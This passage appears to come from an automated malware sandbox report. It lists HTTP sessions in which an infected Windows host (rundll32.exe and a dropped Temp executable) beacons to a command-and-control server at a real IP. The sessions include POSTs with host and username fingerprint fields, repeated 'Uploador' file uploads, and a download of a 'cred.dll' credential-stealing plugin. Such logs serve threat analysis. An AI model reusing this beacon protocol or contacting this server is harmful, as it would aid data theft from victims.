                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.4 | 49772 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:18.234110117 CEST | 4545 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
480 | 192.168.2.4 | 50038 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.279259920 CEST | 12142 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
481 | 192.168.2.4 | 50039 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.411927938 CEST | 12170 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
482 | 176.111.174.114 | 80 | 192.168.2.4 | 50039 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.509175062 CEST | 12224 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
483 | 192.168.2.4 | 50040 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.730499029 CEST | 12358 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
484 | 176.111.174.114 | 80 | 192.168.2.4 | 50038 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.751928091 CEST | 12359 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
485 | 176.111.174.114 | 80 | 192.168.2.4 | 50040 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:26.835181952 CEST | 12359 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
486 | 192.168.2.4 | 50042 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:27.042220116 CEST | 12360 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
487 | 176.111.174.114 | 80 | 192.168.2.4 | 50042 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:27.144037008 CEST | 12361 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
488 | 192.168.2.4 | 50043 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:27.352741957 CEST | 12361 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
489 | 176.111.174.114 | 80 | 192.168.2.4 | 50043 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:27.456310034 CEST | 12362 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 176.111.174.114 | 80 | 192.168.2.4 | 49772 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:18.337394953 CEST | 4545 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:18 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
490 | 192.168.2.4 | 50044 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:27.908010960 CEST | 12362 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
491 | 176.111.174.114 | 80 | 192.168.2.4 | 50044 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:28.006732941 CEST | 12363 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
492 | 192.168.2.4 | 50046 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:28.212729931 CEST | 12363 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
493 | 176.111.174.114 | 80 | 192.168.2.4 | 50046 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:28.314824104 CEST | 12364 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
494 | 192.168.2.4 | 50047 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:28.883387089 CEST | 12364 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
495 | 176.111.174.114 | 80 | 192.168.2.4 | 50047 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 23:00:28.985466003 CEST | 12365 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          496 | 192.168.2.4 | 50048 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:29.225320101 CEST | 12365 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          497 | 176.111.174.114 | 80 | 192.168.2.4 | 50048 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:29.331248045 CEST | 12366 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          498 | 192.168.2.4 | 50049 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:29.614089012 CEST | 12379 | OUT | POST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227735


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          499 | 176.111.174.114 | 80 | 192.168.2.4 | 50049 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:30.117137909 CEST | 12595 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:29 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          5 | 192.168.2.4 | 49751 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:10.249403954 CEST | 4389 | OUT | GET /Hnq8vS/plugins/cred.dll HTTP/1.1
                                                                                                                                          Host: 176.111.174.114


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          50 | 192.168.2.4 | 49773 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:18.544042110 CEST | 4546 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          500 | 192.168.2.4 | 50050 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:30.512340069 CEST | 12595 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          501 | 176.111.174.114 | 80 | 192.168.2.4 | 50050 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:30.610181093 CEST | 12596 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          502 | 192.168.2.4 | 50052 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:30.867643118 CEST | 12597 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          503 | 176.111.174.114 | 80 | 192.168.2.4 | 50052 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:30.968909025 CEST | 12597 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:30 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          504 | 192.168.2.4 | 50053 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:31.183269024 CEST | 12598 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          505 | 176.111.174.114 | 80 | 192.168.2.4 | 50053 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:31.287311077 CEST | 12598 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          506 | 192.168.2.4 | 50054 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:31.497220039 CEST | 12599 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          507 | 176.111.174.114 | 80 | 192.168.2.4 | 50054 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:31.604463100 CEST | 12599 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:31 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          508 | 192.168.2.4 | 50056 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 23:00:31.834881067 CEST | 12600 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
